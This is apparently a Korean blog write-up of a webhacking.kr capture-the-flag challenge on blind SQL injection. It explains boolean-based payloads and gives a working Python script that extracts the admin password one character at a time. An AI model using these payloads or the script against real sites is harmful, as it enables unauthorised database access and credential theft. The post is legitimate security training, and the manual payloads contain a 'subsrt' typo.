zj3t

처음으로 blind sql 인젝션 기법을 배웠습니다. 시간도 굉장히 오려걸렸고 어려웠습니다.
웹 문제를 푼지얼마안되서 웹은 아직 서툽니다. 그래도 포너블보다는 난이도가 쉬운것 같아요~~

1과 2를 입력했을 때 True, 3을 입력했을 때 False, 즉 True와 Flase로만 추측해서 답을 알아가야하는 sql 인젝션 즉 blind sql 인젝션 문제입니다.

여기서 1과 2가 각각 guest, admin인 것은 그동안의 감으로 알 수 있었습니다.

뒤에서 이 감이 확실해 집니다ㅎㅎ



2 and ascii(subsrt(pw,1,1))=97

이 sql 구문이 무엇일까요?? admin의 pw를 가져와서 인덱스 첫번째 부터 1바이트를 잘라서 ascii로 변환한 값이 97과 같은지 물어보는 구문입니다.

(subsrt(pw,2,1))

-pw문자열을 인덱스 2번째 부터([1]) 1바이트를 자른다.
이제 아시겠죠??

이런식으로

2 and ascii(subsrt(pw,1,1))=97
2 and ascii(subsrt(pw,1,1))=98
2 and ascii(subsrt(pw,1,1))=99
2 and ascii(subsrt(pw,1,1))=100
2 and ascii(subsrt(pw,1,1))=101
2 and ascii(subsrt(pw,1,1))=102

.
.
.
.
.비교하면 얼마나 걸릴까요?? 19번 X 26('z'-'a') 인가요??

맨처음에 이렇게 일일히 비교하다가 문제 포기할뻔했습니다.

그러다가 urllib2라는 파이썬 라이브러리를 이용해서 막 블로그를 뒤져가며 찾아 코딩을 해봤습니다.

1. 
   
2. import urllib, urllib2
3. 
   
4. password=""
5. space="%20"
6. for i in range(1,20): #'+str(i)+'
7.         for j in range(97,128):
8.             url="http://webhacking.kr/challenge/bonus/bonus-1/index.php?id=&pw=&no="+"2%sand%sascii(substr(pw,%d,1))=%d" %(space,space,i,j)
9.             req = urllib2.Request(url)
10.             req.add_header('Cookie','PHPSESSID=자기꺼 넣으세여')
11.             res=urllib2.urlopen(req)
12. 
    
13.             if "True" in res.read():
14.                 #print chr(j)
15.                 password +=chr(j)
16.                 break
17. 
    
18. print password